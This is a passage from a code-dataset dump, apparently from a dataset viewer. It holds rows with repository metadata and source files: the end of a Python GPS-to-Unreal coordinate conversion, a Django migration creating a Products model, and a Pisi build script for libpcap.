raise Exception("Please provide a valid WGS84 GPS coordinate")
lat_dist = microsoft_relative_GPS_pos.get_lat_metres_to_other(GPSToUnreal.ORIGIN_GPS)
lng_dist = microsoft_relative_GPS_pos.get_long_metres_to_other(GPSToUnreal.ORIGIN_GPS)
if microsoft_relative_GPS_pos.lat < GPSToUnreal.ORIGIN_GPS.lat:
lat_dist =- lat_dist
if microsoft_relative_GPS_pos.long < GPSToUnreal.ORIGIN_GPS.long:
lng_dist =- lng_dist
#then add this distance to home coordinate
#first calculate azimuth (will probably be ok to do this as dealing with small(ish) angles
bearing = GPSToUnreal.ORIGIN_GPS.get_initial_bearing(microsoft_relative_GPS_pos)
distance = microsoft_relative_GPS_pos.get_metres_to_other(GPSToUnreal.ORIGIN_GPS)
destination = GPSCoordinate._vincentyGeodesicDirect(self.home_position_GPS, distance, bearing)
return destination
#47.641468, -122.140165
#47.6477308, -122.1321476
#return GPSToUnreal.geoPoint_to_GPSCoordinate(microsoft_relative_GPS_pos) + GPSToUnreal.DELTA_TRANSFORM
| [
"d.smyth10@nuigalway.ie"
] | d.smyth10@nuigalway.ie |
39ebc904fd401f81c877b99f75fc240b8ad3a65b | db41f8d1726637c4af165b409526eb9a804ec6bb | /proj1/sales/migrations/0001_initial.py | e07ee0a1ad737a0829e1c4023d6e0286603b0857 | [] | no_license | sumitpareek1992/batch50 | cfb288bcaf5d500c23a3683589fd6b790e56b746 | 57a24f9080f9dc9c91af93ff4be5cb1436361352 | refs/heads/master | 2022-12-10T06:45:58.170206 | 2019-01-09T09:37:38 | 2019-01-09T09:37:38 | 149,378,018 | 0 | 0 | null | 2022-12-08T00:47:03 | 2018-09-19T02:05:02 | Jupyter Notebook | UTF-8 | Python | false | false | 605 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-11-10 02:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Products',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=250)),
('costprice', models.IntegerField()),
],
),
]
| [
"sumit.pareek1992@gmail.com"
] | sumit.pareek1992@gmail.com |
06c1ae158672d9a651a94f2a70faf79cce3232d5 | fff54b01b46cef0bbc70a6469c88c01c82af5a57 | /network/analyzer/libpcap/actions.py | 33f3310aad9a49bdb10846b36e483c86e64304b9 | [] | no_license | LimeLinux/Packages | e51deae6c0d1406e31f06caa5aaa7749466bef0b | d492e075d8b051df68b98c315ad0628e33a8fac4 | refs/heads/master | 2021-01-11T12:37:22.150638 | 2018-08-30T18:24:32 | 2018-08-30T18:24:32 | 77,054,292 | 5 | 19 | null | 2018-02-02T17:24:06 | 2016-12-21T13:33:45 | Python | UTF-8 | Python | false | false | 853 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 3.
# See the file http://www.gnu.org/licenses/gpl.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import get
def setup():
shelltools.export("CFLAGS", "%s -fPIC" % get.CFLAGS())
autotools.autoreconf("-vfi")
autotools.configure("--prefix=/usr \
--enable-ipv6")
def build():
autotools.make("all")
autotools.make("shared")
def install():
autotools.rawInstall('DESTDIR="%s"' % get.installDIR())
# No static libs
pisitools.remove("/usr/lib/*.a")
# it is needed for ppd etc.
pisitools.insinto("/usr/include", "pcap-int.h")
pisitools.dodoc("CHANGES", "CREDITS", "README*", "VERSION", "TODO")
| [
"zirkovandersen@gmail.com"
] | zirkovandersen@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.